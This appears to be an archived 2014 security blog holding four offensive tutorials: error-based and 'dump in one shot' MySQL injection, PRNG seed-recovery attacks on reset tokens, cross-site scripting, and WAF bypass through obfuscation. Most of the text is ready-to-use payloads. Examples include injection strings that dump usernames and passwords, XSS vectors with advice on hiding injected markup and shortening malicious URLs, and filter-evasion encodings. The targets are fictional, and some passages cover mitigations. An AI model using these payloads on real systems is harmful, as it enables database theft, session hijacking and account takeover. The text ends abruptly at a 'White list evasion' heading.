Monday, 17 November 2014

Error: You have SQLi in your polygons

An introduction to error based SQLi

In State of the Union I introduced the SQL injection attack vector and briefly described 3 basic types, error, union and blind. I've covered union based attacks in depth already, this post will introduce error based SQLi. For this tutorial I will assume you know the basics of SQL and SQLi already, if you don't please read State of the Union first.

Update - For anyone looking for a DIOS tutorial for error based injection then please check out my blog post here -


The principle of error based SQLi is the same as union based, an adversary supplies input to a web application which is used to build a query to execute against a database, by including SQL in the input you can alter the behaviour of the query and return data that is outside of the original scope. For example a search function to find news articles might be able to return information about the structure of the database and even specific fields such as passwords or other sensitive information.

In union based SQLi the attack methodology is to discover where data is being returned by the database to the visible portions of the web application and then union the existing result your own data. If the page only displays the first result in the final set you can alter the conditions under which the original data is selected to return zero results so the final set only contains your custom data.

Under some conditions this method may not work, here's a few examples.
  • If there's any kind of logic designed to check the input parameter is valid, this stops you from making the original select return zero results. If this is encountered in a web page that can only display a fixed number of results then your appended data is ignored.
  • If none of the results are returned to the screen directly, it's possible the results might be interpreted through some other logic first and not appear on the page as plain text but rather trigger some other change.
  • If the entry point of the injection is inside a nested query you might find that after enumerating the column count using ORDER BY that a UNION SELECT still throws an invalid column count, this is likely a nested select.
In these cases where you cannot return arbitrary data back to the screen you need to switch from union based SQLi to error based.

MySQL errors

MySQL errors can be suppressed however if they're enabled and the error message is returned to the screen anywhere on the web application you have another method of extracting data as the error message may contain parts of SQL statement and if part of the statement has already been evaluated it could reflect actual data from the database.

When the SQL server is presented with a query it will resolve the most nested parts first before evaluating the outwards until the whole query is finished or until it hits an error. This means if you nest a select statement inside some SQL designed to create an error, the data will be selected first and then returned to the screen inside the error message. This is the basic attack methodology of error based SQLi.

Geometric SQLi

There are numerous ways of performing error based SQLi, one recently discovered method involves using the geometric functions built into MySQL. Polygon() allows you to define a polygon given a series of vertices or points, points are defined as a pair of X,Y coordinates using double-precision for example 

point(10.75, 21.37)

Polygons are defined as a series of points for example

polygon((0 0, 1 1, 2 2, 3 3, 4 4),(5 5, 6 6, 7 7, 8 8, 9 9))

If you provide some malformed data such as


You'll get an error something like this:

Unknown error: 1367 (Illegal non geometric '1' value found during parsing).

Note that the value '1' is reflected back in the error message. Let's try selecting something that requires the SQL server to evaluate data from the database such as the version variable.

polygon(select @@version)

Unfortunately this gives us the following error:

Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select @@version)

Let's instead try selecting the version into a temporary table which we'll call 'a' and then select the value from that, for example:

polygon(select * from(select @@version)a)

Now we get the error message:

Unknown error: 1367 (Illegal non geometric '(select `a`.`@@version` from (select @@version AS `@@version`) `a`)' value found during parsing).

This is closer to what we need, we're selecting the version number correctly, it's being evaluated by the SQL server, however the actual value is not being returned in the error message, instead it's returning the default column name of the temporary table, when not explicitly stated the default name is the first value in the results. We can repeat this trick and nest this in yet another select for example:

polygon((select * from (select * from (select @@version)a)b))

Now we're selecting the value from the temporary table 'a' into a new temporary table 'b', this forces the value in table 'a' to be evaluated, now when we get an error it contains the real version number. When doing embedded or nested selects in SQL the inner most selects are evaluated first so the values can be used by the outer selects, if the value you're trying to extract using SQLi hasn't evaluated in the error message, simply use this trick of selecting the value twice. The error should now look something like this:

Unknown error: 1367 (Illegal non geometric '(select `b`.`@@version` from (select '5.50.00' AS `@@version` from dual) `b`)' value found during parsing).

You'll now notice that in the error message we now have legible data pulled from the server, we've selected the MySQL version 5.50.00. How does this look in a fictional example, assume the following page parameter exists (the green text is the static part of the URL, red is the user supplied input)


We can exchange the value of 50 for the parameter news_id, which looks like this:

URL * from (select * from (select @@version)a)b))

Selecting data

You can extend this basic concept with any arbitrary SQL, so all the same tricks to map out the database and select data work as you'd expect, for example if you want to select a list of tables from the default schema:

URL * from (select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a)b))

To find the columns inside these tables you can use the following where TBLNAME is the name of the table you're interested in. Remember to Hex encode the value.

URL * from (select * from(select group_concat(column_name) from information_schema.tables where table_name=TBLNAME))a)b))

And finally to select data:

URL * from (select * from(select group_concat(0x0a,COLUMN1,0x3a,COLUMN2,0x3a,COLUMN3) from TBLNAME)a)b))

Any feedback both positive and negative is welcomed, please leave a comment if you spot any errors or have any questions. Please do not post real world examples as they will be deleted, all questions should focus on the theory only, thank you.

Greetz to benzi who taught me this.

Monday, 3 November 2014

PRNG and other Batman fight noises

An introduction to PRNGs and why they're bad for security.

You may have heard that Pseudo Random Number Generators (PRNGs) are an unsafe source of randomness for security related purposes, and if you're like me you may have struggled to understand how this could lead to a practical attack against applications that use PRNGs. This tutorial will explain why PRNGs are bad and demonstrate a practical attack against them.

What is a PRNG?

The first thing to understand about Pseudo Random Number Generators is that they're completely deterministic, this means that given the same starting conditions they will always produce the same string of "random" numbers. However they do appear random to the human eye, they're superficially unpredictable and they give an even distribution of numbers across a significantly large output.

PRNGs are seeded which means the random function is initialised with some initial value (the seed) and this decides what the random sequence will be, if you seed a PRNG with the same value you get the same series of random numbers, this series eventually repeats itself, the number of outputs before repetition occurs is called the period. The seed can sometimes be specified and in some languages the default seed will take information from the system such as the time or the system process ID.

PRNGs are typically used in applications where behaviour only needs to superficially appear random and it's not important that attackers are able to predict future values, typically they're built for speed and so can be used in real time simulation such as video games that need some degree of apparent randomness. This is very important because any function that is built around performing quickly can also be brute forced quickly.

It's worth noting at this stage that the seed values and the internal state of the PRNG can be different sizes, typically measured in bits. Because the initial state of the PRNG is decided by the seed the number of states that can be generated is limited by the total number of unique seeds. A PRNG with a large internal state of thousands of bits but with only a 32bit seed will only realise a small fraction of the total number of possible internal states.

It gets even worse when you consider that an initial seed may not come from a source that contains 32bits worth of unique information, something like a time stamp or a process ID is typically even smaller, thus reducing the number of possible states of the PRNG can produce to be much smaller than internally it's capable of generating.

How are random numbers used.

Typically random numbers are manipulated through some process to make the range of possible values fit the desired output, for example if you want a percentage output you'd normalize the random output into a range between 0 and 100, this is commonly done by restricting the range of the output of the PRNG to a variable of type float, between 0 and 1, then multiplying the float by whatever value you need to achieve the desired range, in the case of a percentage this would be x100, in the case of needing a random letter you'd multiply this by x25, this gives you 26 values between 0 and 25, you can then map each number to a letter to get plain text output derived from the numbers. Characters is often how the numbers are actually presented to the user in the form of some kind of security token, you'll find these being used for password reset tokens and CSRF tokens.

Attack theory

The basic theory behind attacks fall into two categories.

Firstly is that if you know the PRNG being used and you can determine the seed value then you're able to generate the entire string of random numbers, you can then compare some sample of random output from the application and determine where in the current series the application is and use that to generate the future random values. For practical attacks against PHP applications using these methods I'd highly recommend this talk from Blackhat 2012 by George Argyros and Aggelos Kiayias from the University of Athens.

In the cases where the seed is unknown you can use brute force attacks, you sample some output of the application you wish to attack, you run them backwards through the same maths that processed the random value into something useful, and you determine what the seed is. From there you follow the same process of generating all values for that seed and working out the current applications place in the series, again allowing you to predict future outputs. For practical attacks against many different types of PRNGs using this method I'd also recommend this talk from Blackhat 2013 Derek Soeder, Christopher Abad and Gabriel Acevedo of You can also find their white paper here.

Introducing Prangster

In the talk at Blackhat 2013 that I previously mentioned, a proof of concept tool was released called Prangster, you can download it here, it's open source and written in C#. They include instructions for compiling it on the website, it requires windows and Microsoft .NET 2.0, or can be built with Mono for Linux/Mac.

The attack methodology is quite straight forward.

1) Find an application that creates some kind random output, this could be something like a security token used to reset passwords or account credentials.

2) Collect samples, you need to distinguish between static parts of the output and the parts which are pseudo random, for example if you're analysing randomly generated passwords and each password contains some static component then ignore that. Try and determine a unique list of all characters used in the output, is it lower case alpha only, is it alpha-numeric, etc. This is needed later to build an alphabet.

3) Determine the type of PRNG being used, often this can be done by determining the platform which the application runs on, if it's ASP.NET for example then there's a good chance the Microsoft random() class is being used. You also need to guess how the PRNG maps the output in numbers to the characters you see in your output, if the application is open source or the source code is available you can determine this directly, otherwise it's best guess.

4) Use Prangster to analyse the samples you've recovered, determine the seed that created this string of random numbers, then use this seed to generate all the random numbers the application is using, and use that to predict future randomness.


Once compiled you can run Prangster from the command line, it has 3 basic modes you can use.

r - Recovers the seed that generate the input. It requires the PRNG type as a parameter, a string of output that you're sure was generated in that order, and an alphabet. The alphabet is the mapping of numbers to characters, for something simple like an output that only contains lower case alpha your alphabet would probably look something like this "abcdefghijklmnopqrstuvwxyz". If you're lucky this will return the seed value used to generate the random series.

g - Reproduces a series of outputs given a specific seed and a length of outputs, it takes parameters of the PRNG type, the alphabet, the seed value (learnt from -r) and the length of output you wish to generate.

s - Seeks a series given some initial seed and an offset, then returns the seed which represents the new state, it takes the parameters for the PRNG type, the seed value and the offset amount.

If you run Prangster without any parameters it will echo the usage to the screen.


Let's consider an example, let's say we're attacking an ASP.NET application which is generating unique password reset tokens and these tokens appear to use upper and lower case characters only, you might try the following commands in Prangster

<some collected output> | Prangster.exe r PrngDotNet abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ

If this didn't get you a result, it's possible the alphabet is wrong, this is just best guess on how the developers mapped the random() output to readable characters, it could be reversed, for example
<some collected output> | Prangster.exe r PrngDotNet ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz

Some trial an error is likely to be required, especially if you do not have access to the source code, luckily Prangster runs quite quickly in most circumstances allowing you to try multiple alphabets quite quickly. If my explanation of Prangsters usage is hard to follow then I suggest watching them demo a real attack scenario in their Blackhat presentation starting at 32:40.

A final note of respect to the team at Cylance who put this together, this is an impressive tool which can predict randomness in many applications by simply analysing the output of those systems, in this respect it's completely black box analysis. Their white paper goes in to more depth about the optimisations they used to speed up brute force attacks which can be found here.


This section is an update to this post to elaborate on the mitigation for these attacks. The solution is simple and it's mainly through ignorance it's not used more often, there is already a class of RNGs that produce Cryptographically secure random numbers (CSRNGs), Linux comes with dev/random and dev/urandom which get their randomness straight from the Linux kernel. The kernel has access to various devices attached to the system through the device drivers, this allows collection of envionmental noise which becomes the source of random number generation, rather than a static list. In windows the equivalent is CryptGenRandom.


Cross Site Scripting

This tutorial will introduce you to Cross Site Scripting or XSS for short.

Introduction to XSS

XSS is a vulnerability in web applications which allows an attacker to inject JavaScript in to a page which then executes inside the browser of another user. It's a very powerful attack since JavaScript can access a lot of information about the clients browser and even modify the DOM (Document Object Model) of the page which can alter the look and behaviour, as well as make requests to the website on behalf of the user and modify responses, because the script can run silently these kind of attacks are deadly for stealing personal information.

One common attack is session hijacking where the value of the users session cookies are stolen and can be sent to an attacker who can use it to bypass log in/security that relies on cookies to identify and authenticate users.

The basics

The anatomy of an XSS attack is for an attacker to supply input to a web service which is then returned to the page for others to see. There's 2 basic methods of doing this, persistent and reflected.

A persistent XSS attack sends a payload to the web application which stores that input in permanent storage server side, typically a database. When other users make requests to the web server the reply includes the payload. For example the comments section for a blog post, users can provide text input plus their XSS payload that is stored in a database and every user who visits that page loads the comment along with any script. This is a broad attack that can target many users at once.

A reflected XSS attack injects script in to the page parameters of a URL, the server responds with the script somewhere in the response, this is a one time targeted attack that only affects the users who follow that specific URL. The attacker then distributes the custom malicious URL to targets either directly by sending it to them or the by publishing the link somewhere on the web and hoping users click on it. A good example of a reflected attack is a search feature on a web application which creates a GET request that includes the user's search term as a page parameter and returns search results plus the payload.

Just like with SQLi attacks, not all sites are vulnerable to XSS, only sites which are badly written and contain vulnerable parameters or inputs can be attacked.

Context matters

Web applications have a page life cycle which all requests go through, during this process user input passes through several different interpreters each have a set of characters that have special meaning in that context. XSS vulnerabilities exist when user input is allowed to pass into the body of HTML while containing characters that have special meaning in this context.

To stop XSS attacks the users input must be HTML encoded before being inserted into a HTML document, this type of encoding takes all special characters and alters them to be a safe equivalent which display correctly when rendered by the browser but cannot modify the mark up. For PHP use htmlspecialchars() documented here and for ASP.NET use htmlencode() document here.

This isn't the whole story however, if user input is inserted directly inside existing JavaScript for example inside a <script> tag, or inside any event or evaluation that runs JavaScript then HTML encoding may not be sufficient.

For more on prevention see XSS prevention cheat sheet.

Finding vulnerabilities

To find XSS vulnerabilities you need to test all user input to the web application and check all the places in the HTML response this input appears, this may require viewing the source code as not all occurrences may be visible or obvious. For example you might submit your name to website profile page which appears as both text on the page but it might also appear as the alt attribute for your profile image tag, this wouldn't be immediately obvious just looking by eye. The best trick is to use test input that's unique and wont appear anywhere else on the page and you can search for it (ctrl+f) in the source code.

There are 3 basic types of user input:

  • Page parameters passed in the URL of a HTTP GET request.
  • Parameters passed in the body of a HTTP POST request.
  • External resources the web server fetches.

URL parameters 

Page parameters are passed in the URL of a HTTP GET request, these are typically used to modify the result of the response you'll get from the server, this type of input is used to create reflected XSS attacks. For testing simply use a browser and enter different input directly into the URL inside of parameters. If there's any characters you need to URL encode you can use this XSS calculator.

Note that Internet Explorer and Chrome both have XSS prevention built into the browser which examines parameters inside the URL and looks for common XSS vectors, they will find most attempts to enter <script> tags and other basic attacks, however more subtle XSS vectors may get through. Because of this it's best to use Firefox for testing exploits first and then adapting or obfuscating the attacks for other browsers as necessary.

Another reason I recommend Firefox for testing is because when you view the source of the document you see the raw source, in both Internet Explorer and Chrome any HTML encoded characters appear as the user friendly variants. So you cannot tell the difference between a raw angle bracket < and the HTML encoded equivalent &lt. This may lead to confusion where apparently correctly HTML is not rendering as you'd expect, in Firefox this is not a problem.

POST parameters

Posts parameters are passed to the server when you submit a form on the page causing a HTTP POST, they are passed back in the body of the page request and as such cannot be used for reflected attacks since you cannot remotely cause post backs.

There may be client side data validation done on a page in JavaScript before it will allow you to submit a form, there are different ways to bypass this, you can modify the JavaScript running in the page manually using developer tools, or you can send your HTTP POST requests through a local proxy which can intercept and modify them in transport.

Some good examples of proxies for penetration testing are Paros for Windows as well as a newer and better maintained fork called ZAP, or if you're running Linux Burp suite is popular. You need to configure and run the proxy, normally configured on the same machine as the browser. Then change your browser settings to send requests through the proxy, in Firefox open the options, switch to the "Advanced" section, select the "Network" tab, and under Connection click the "Settings..." button. Now set "localhost" or "" as the HTTP proxy and set the port you've configured your proxy to use, most default to 8080. Make sure to tick "Use this proxy server for all protocols" and OK all the windows.

Now you can capture and modify page requests, these are helpful tools not just because you can bypass client side filtering but because you're no longer limited to basic text input, you can modify everything posted back to the server. This increases the number of possible attack vectors significantly, for example if the site allows uploading of files you can upload a normal jpg file in the browser then proxy the request and change the file name/extension as well as include characters that wouldn't normally be part of legal file name. In this example if this file name is inserted into a database and later used on a page somewhere it could potentially be used to create XSS attacks that otherwise aren't possible using just the browser by itself.

External resources

Some web applications make requests for resources on other servers, they may crawl another web page or source of data and then inject this into their own database to be used as part of the content for a page. If the source of the data is something you can control or if you can send the target web server some input that makes it visit resource you're in control of, this becomes another attack vector for XSS.

A real world example I've used during testing abused a flaw in a feature to allow users to share URLs with each other. The behaviour of the target website was to take user input, visit the URL, scrape the page to find the page title and then use this as the display text for the URL. Note that the URL input itself wasn't vulnerable to XSS as the correct characters were filtered out, however the page title scraped from the external resource was vulnerable to XSS.

Keep this in mind when testing, it's not just direct user input to a web application that might be vulnerable, but any kind of source of 3rd party data. A clever variant of this was done recently using XSS inside TXT records in DNS to inject any website displaying Whois information without first HTML encoding the record.


In the real world the type of XSS vector you can use will vary greatly depending on how the output back to the page is handled and where the output is injected in to. The output may be modified in one of several different ways, some common ones are:

  • Removing specific characters that aren't allowed.
  • Removing specific words or strings of characters that aren't allowed.
  • Replacing unsafe characters with the HTML safe equivalents using HTML encoding.
  • Denying the entire string altogether or throwing an error.
  • Inserting other characters to break up words that aren't allowed.
Because the number of different XSS attack vectors is so staggeringly vast most of these techniques allow through at least some types of attack, the safest is HTML encoding but as mentioned previously this may not stop attacks where the output is injected directly inside of existing JavaScript.

You can break down the attacks in to 2 basic types, those which are injected into the body of the document, and those which are inserted into the mark up of the document. All examples given below show existing HTML in green and user input in red.

For user input that is inserted in to the body of the document you need to escape back into mark up in order to inject any kind of JavaScript, this requires using angle brackets < and >. In the example below the output is injected between div tags.


For user input that is inserted directly into parts of the mark up, for example inside the alt attribute of an image tag, then you only need escape the attribute using quotes ". In the example below I've added an event which triggers when the image has loaded, no angle brackets are required because our injection point is already inside the mark up.

test" onload="alert(1);
<img src="/images/logo.jpg" alt="test" onload="alert(1);" />

Persistent attack Examples

There are too many different XSS attack vectors to mention them all in detail, for a cheat sheet list of many of the common techniques I highly suggest the cheat sheet. However I will cover a few basic persistent attacks to demonstrate the principles.

Basic injection into image location:

<img src="javascript:alert(1);">

Modern browsers have a much more relaxed parsing engine which can allow for mistakes in HTML to render correctly, as such you can often remove some formatting, these tricks are often browser specific depending on how strict the rendering engine is, this example doesn't require quotes of semicolon:

<img src=javascript:alert(1)>

Here's a slightly more complex fictional example, lets say you can sign up for a website and pick a user name, you're given your own profile page on the website which ends in your profile name.

Profile Name

This could be a good and somewhat obscure attack vector, If the site programmatically creates anchor tags anywhere to link to your profile they might look like this:

<a href="/userprofile/Frosty">Visit profile</a>

The right user name might result in JavaScript execution, in this case by injecting an event into the attribute. If the mouse is moves over the anchor tag then it will fire the JavaScript.

Frosty" onmouseover="javascript:alert(1);
<a href="/userprofile/Frosty" onmouseover="javascript:alert(1);" />Visit profile</a>

Reflected attack examples

A very common reflected attack can be found in many search features, a user enters some text to search and clicks search, that creates a GET request to the server for the search results page and inside that request is a page parameter which contains the search term. A fictional example:


This takes the parameter called search, with the value of usersearch, In the results page you'll find HTML that looks something like this:

<p>Your result for usersearch returned 0 results</p>

You can create a malicious URL like the following

<p>Your result for <script>alert(1)</script> returned 0 results</p>

Sending this URL to a target and have them follow it will inject JavaScript into the results page. Only the users following that specifically crafted URL will be effected.

To tidy up long or complex reflected attacks you might want to use URL shortening services like Bitly or TinyURL.

Tidying up

In some cases you might want to escape out of some input but by doing so leave behind invalid HTML which creates rendering errors on the page, there's nothing to stop you from including additional HTML and CSS in your input to correct these. In a previous examples we used the onmouseover() event, however if this has already been defined in the tag we'll have a problem. Consider the following:

Frosty" onmouseover="javascript:alert(1);
<a onmouseover="changecursor()" href="/userprofile/Frosty" onmouseover="javascript:alert(1);">Visit profile</a>

Because our attribute came second it wont fire, if angle brackets are allowed in the user name we could just escape out of the entire anchor tag.

<a onmouseover="changecursor()" href="/userprofile/Frosty"><script>javascript:alert(1)</script>">Visit profile</a>

However this will look messy on the page and possibly alert people something is wrong, this is an instance where you might want to tidy up your XSS attack, create matching tags in order to create a 2nd valid anchor tag and then hide it by setting visibility using CSS.

Frosty">Visit Profile</a><script>javascript:alert(1)</script><a style="visibility:hidden;
<a onmouseover="changecursor()" href="/userprofile/Frosty">Visit Profile</a><script>javascript:alert(1)</script><a style="visibility:hidden;">Visit profile</a


In many cases beating blacklist filters is simply a matter of obfuscation, for example adding character to break up key words like "javascript" such the tab character or new line characters are good for this:

<img src="jav ascript:alert(1);">

<img src="jav&#x09;ascript:alert(1);">

You can often use different encoding types, in the URL you can supply URL encoded characters, an extremely helpful tool for calculating obfuscations can be found here 

Monday, 27 October 2014

One SQLi to rule them all

Advanced SQL injection

In State of the Union I cover basic union based MySQL injection techniques which have some limitations, in this post I'll cover some more advanced techniques that allow you to select entire tables and how that can be used to map out all the schemas, tables and columns in a single query.

Introduction to variables

More advanced MySQL injection makes use of user assigned variables, the documentation for assigning MySQL variables can be found here.

You may have already used system defined variables such as the MySQL server version which is referenced with @@version, in a similar way user defined variables are referenced with a single @ and then the name you wish to give it.

In a SET statement the syntax for assigning a user variable is:

SET @var_name = expr [, @var_name = expr] ...

However if you wish to use variables outside of a SET statement, such as when we inject inside of an existing SELECT statement, then you assign a variable using

@var_name := expr

The reason you cannot use regular = is because this is treated as a comparison operator outside of SET statements. It's worth noting at this stage that you don't need to provide a variable name other than just @ by itself, so @:=1234 is valid.

Limitations of concat() and group_concat()

Typically when first learning SQLi you'll start by using UNION to append some data you want to the data that's legitimately used to populate the web page, then you set the condition for pulling the legitimate data to return zero results and what appears in the page is simply whatever you've appended. The basic way of selecting data is shown below, this example is taken from my blog post called State of the Union, note that everything in green is static and everything in red is user supplied input.

URL UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata --
SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata --

This example is selecting a list of schemas from the table "information_schema.schemata", because the result is returned to a single column of a larger result set it has to be a single string, this is the purpose of group_concat().

A problem that you might run into is concat and group_concat have a server defined maximum length and the default is 1024 characters, this limits the amount of data you can get from any single query using this method. You could potentially select one row of data at a time by swapping group_concat() for concat() and then setting a LIMIT to pick the row you want to select, but this is tedious.

Selecting an entire table in one query

The following select statement is a template for selecting the columns you want from a specific table, you simply replace TABLE with the schema.table you want to select from and COLUMNS with a list of comma separated column names, plus whatever formatting you want to make the output easily readable.

(select (@) from (select (@:=0x00),(select (@) from TABLE where (@) in (@:=concat(@,0x0a,COLUMNS))))x)

This looks a bit intimidating at first, so let's break this down into smaller parts and look at what each part means and why it's used. Keep in mind that SQL is interpreted by the server from the inner most sub-selects first, so to understand this we'll follow the same method. Let's start with the highlighted section first.

(select (@) from (select (@:=0x00),(select (@) from TABLE where (@) in (@:=concat(@,0x0a,COLUMNS))))x)

The section in orange is evaluated first, it simply assigns the user variable called @ the value 0x00 which is the hex representation of ASCII NULL, note this is not the same value as DB NULL which represents a field in the database has no value. The purpose of this is to make sure this variable is empty as it may contain data from being used previously, the MySQL server retains user assigned variables between queries, it's not strictly required the first time you use it.

Next the section in blue is evaluated.

(select (@) from (select (@:=0x00),(select (@) from TABLE where (@) in (@:=concat(@,0x0a,COLUMNS))))x)

Or isolated by itself:

select (@) from TABLE where (@) in (@:=concat(@,0x0a,COLUMNS))

Lets look at the select part first, this statement can be simplified by ignoring the condition at the end for now and consider what value is actually being selected.

SELECT 'somestring' from TABLE WHERE [some condition]

The behaviour of MySQL when selecting a string or in this case a variable from a table, rather than a specific column or columns, is to simply return the string. This is a helpful trick I use in a blog post called SELECT tips,tricks FROM help INTO OUTFILE 'user@localhost' where this same method can be used to select arbitrary data into OUTFILE and write the result to the local file system. So for example:

SELECT 'Hello World!' FROM news

The result of this query is just literally just the string 'Hello World!', as long as the table "news" actually exists. This means you can think of the result of the entire part of the query in blue to simply be the variable @

Let's stop to consider what our query now looks like when we simplify it

(select (@) from (select NULL,@)x)

But what value does @ actually have? This is where the conditional clause comes in, lets now consider the end of the blue sub-select, we'll replace the table and columns with fictional examples.

select (@) from news where (@) in (@:=concat(@,0x0a,id,0x3a,headline,0x3a,body))

Here a clever trick is being used, when the whole statement is run at this point all that has occurred is @ has been set to NULL, and we're now setting the value of @ to be the concat() of itself, a new line character then the columns called id,headline,body from the first row of the table news, all separated by 0x3a which is the hex value for ":" just to make the results easier to read.

The WHERE/IN clause is forcing MySQL to evaluate every row of the table called news one row at a time re-assigning the variable @ every single row, because @ is inside the concat() function the value of the next row is appended onto the value of the last, this loop repeats until every row has been read.

We need this trick because there is no append operator in MySQL there is only assignment ":=", if you're used to programming you might find it helpful to consider this as equivelent to using the assignment operator "+=" that most languages support, where a+=b is the same as a=a+b. If you left out the variable @ from inside the concat() function then you'd simply be reassigning @ each row losing the previous value each time, the final value would simply be the last row in the table which isn't what we want.

Now we know what @ finally equals, that is all the rows of the table we've selected from, let's reconsider our simplified query:

(select (@) from (select NULL,@)x)

We're selecting the @ variable which is just one large string containing the entire table, as we've learnt before this select simply returns the value of the string. It's being selected from a temporary table we've created by selecting NULL and @ from elsewhere, the x on the end is an alias for this table, every temporary table created requires an alias otherwise you'll get the error "every derived table must have its own alias".

All that is left to do is use this entire select statement as a replacement for one of the columns of our UNION. Here's a fictional example:

URL UNION SELECT 1,(select (@) from (select (@:=0x00),(select (@) from users where (@) in (@:=concat(@,0x0a,id,0x3a,username,0x3a,passwd))))x),3,4--
SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,(select (@) from (select (@:=0x00),(select (@) from users where (@) in (@:=concat(@,0x0a,id,0x3a,username,0x3a,passwd))))x),3,4--

The result of this will be a single string inserted into the web page instead of column 2 (the headline), which contains the "id", "username" and "passwd" columns from every row of the "users" table, it will be formatted so each row from the table is on a new line and columns are separated by colons.

Selecting all schemas, tables and columns in one query

We can use this technique to essentially map out the entire database in a single query also known as DIOS (Dump In One Shot), we simply use the same technique but read the meta data about the database from the schema called "information_schema" and the table called "columns". This table contains every column name in the database, what table it belongs to and what schema that table belongs to. Our modified query looks like this:

(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@ and table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (@)in (@:=concat(@,0x0a,table_schema,0x3a,table_name,0x3a,column_name))))x)

You'll note that I've added some conditions, this is to exclude all rows which contain the table_schema called "information_schema", or rather the hex encoded equivalent. The information_schema contains meta data on all schemas including itself and because the information_schema is a fixed format and it's already well documented we don't need to select that, it will just inflate the result to be much bigger than we need, we're only generally interested in custom user created tables.

Our example now becomes:

URL UNION SELECT 1,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@ and table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (@)in (@:=concat(@,0x0a,table_schema,0x3a,table_name,0x3a,column_name))))x),3,4--
SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@ and table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (@)in (@:=concat(@,0x0a,table_schema,0x3a,table_name,0x3a,column_name))))x),3,4--

The result of which will be one long string where each line contains the fields schema name, table name and column name for every column in the database, each separated by colons and each on a new line.

If you have a question please leave a comment and I'll get back to you, please note that any questions referencing real websites with live SQL injection vulnerabilities will be deleted.

Saturday, 25 October 2014

WAF beating.

Grab yourself a Stella it's time for some WAF beating.

This tutorial will cover WAF bypassing for SQLi, this is an in-depth tutorial designed to teach theory rather than giving you the smallest number of steps to bypass WAFs.


Web Application Firewalls are systems which proxy web traffic from users of web services to the web server and check for malicious attacks such as SQLi and XSS. Sometimes these are separate physical devices which sit between a web server and the gateway or they might be software based and run on the web server.

It's the job of the WAF to detect attacks and then take some action, it might be to alter web requests before they reach the web server to remove malicious code, to bounce or deny the request all together or possibly track malicious activity and alert staff.

Most WAFs aren't perfect, they operate primarily on blacklists and rules in order to spot malicious user input, however standards are constantly changing and WAFs have to be kept up to date with the latest rules and patterns to be effective.

Obfuscation of input is the standard method for beating WAFs, you take what looks like an SQLi or XSS attack and you modify the request so it no longer matches the patterns the WAF knows about, you can often do this through encoding parts of the input differently or using various tricks of the trade to fool the filters. It's game of cat and mouse between developers and hackers.

Spotting WAF implementation

Spotting WAFs is normally quite easy, their behaviour tends to be one of two things, either modify the query so what is sent to the server is missing malicious user input, the basic approach would be to remove certain keywords such as UNION, SELECT, CONCAT etc, if you find your requests being modified and returned without these words you've found a WAF which is removing them. The second method is to throw up either a 403 error page (Forbidden) or throw up some other custom error page with any number of custom error messages. You can tell if this is a WAF by re-sending the same query but removing keywords one at a time, if you've removed some keywords and the page renders correctly afterwards then you know you're dealing with some kind of WAF.

Enumerate illegal keywords

The first thing you should do is work out which keyword are tripping up the WAF, start with basic user input you know is allowed past the WAF and mark this as your baseline test. Now you need to add keywords into that baseline and test to see if the WAF reacts. Do this one keyword at a time and make a note of what is and isn't allowed, in the case of SQLi it's best to try all of the common SQL keywords, some common ones are listed below but this is not exhaustive:
  • SQL Commands
    • SELECT
    • UPDATE
    • DELETE
    • JOIN
    • UNION
    • WHERE
    • ORDER
  • SQL Functions
    • concat()
    • group_concat()
    • hex()
    • cast()
Apply some trial and error and get a feel for what is allowed and what is not.


Obfuscation is the last step, modify problematic keywords bypass the filters, let's start with a fictional example of a basic MySQL injection attack taken from a prior post called State of the Union, this attack is simply enumerating all of the schemas that exist in the database by reading the information_schema.schemata table:

URL UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata --
SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata --

Let's assume that our fictional WAF doesn't allow the key words "union", "select" or "schema_name".

Let's start with the basic attacks and increase in complexity, it's unlikely the simple obfuscations will work on their own but they may be helpful to merge with other types of obfuscations.

CaSe seNsitIvity

Probably the most basic attack, simply alter the case of some of the characters for example

URL UniOn SeLEcT 1,group_concat(schema_name),3,4 from information_schema.schemata --

Be careful that you're not modifying the case of something that is case sensitive in the context of SQL, certain versions of SQL on certain systems might have case sensitive table names for example.


Comments are ignored by the SQL server and are a good source of obfuscation as they can be tricky to resolve correctly. The basic syntax of a comment is /* to start and comment and */ to end it, everything in between is ignored.

You can use this to break up words so that basic string comparisons fail For example:

There are lots of variants on this attack, you can put dummy letters inside the comments for example:

You can also nest comments, for example:

As well as throwing in broken comment tags, for example:

/*!Advanced Comments*/

There's more advanced tricks you can play with comments specifically on MySQL servers, they support conditional comments where adding an exclamation mark before your text inside of a comment you tell MySQL to actually use the text inside the comment as it would normally, the following example would execute and return you the schemas as normal:

URL /*!UNION*/ /*!SELECT*/ 1,group_concat(schema_name),3,4 from information_schema.schemata --

You can obfuscate this further by adding in the version number of MySQL you wish to conditionally check for, the server will execute the comment as normal syntax if its version is equal or greater than the value you supply, the following example will execute only if the server is equal or greater than version 5.00.00

URL /*!50000 UNION*/ /*!50000 SELECT*/ 1,group_concat(schema_name),3,4 from information_schema.schemata --

The full documentation on comments can be found here:


MySQL supports many different types of encoding such as hex, binary, base64, as well as encryption types such as Md5 and SHA1, while keywords cannot be altered with this method a lot of other values can be, such as schema names, table names and values for comparison.

For example if schema_name is blacklisted you could hex encode using a free tool making sure to add 0x to the start of the value, this means schema_name becomes 0x736368656d615f6e616d65, or you could use the base64 equivalent and then base64 decode it inside the query, for example FROM_BASE64(c2NoZW1hX25hbWU=)

MySQL now also supports XML functions so you can use functions like extractvalue() in similar ways.

White list evasion

